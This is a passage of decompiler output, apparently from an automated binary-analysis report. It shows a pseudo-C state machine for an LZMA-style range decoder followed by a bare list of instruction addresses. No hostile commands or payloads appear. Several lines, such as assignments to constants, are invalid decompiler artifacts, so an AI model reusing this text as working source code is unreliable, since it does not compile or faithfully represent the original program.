								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406398
0x00406398
0x0040639c
0x00406453
0x00406456
0x00406462
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00000000
0x00406709
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x0040672b
0x00000000
0x0040672b
0x004063a2
0x004063a6
0x004068e7
0x004068e7
0x004068ea
0x004068ee
0x004068ee
0x004063ac
0x004063b2
0x004063b5
0x004063b9
0x004063bc
0x004063c0
0x00406886
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x00000000
0x004068e3
0x004063c6
0x004063c9
0x004063cf
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x004063fa
0x004063fa
0x004063fa
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
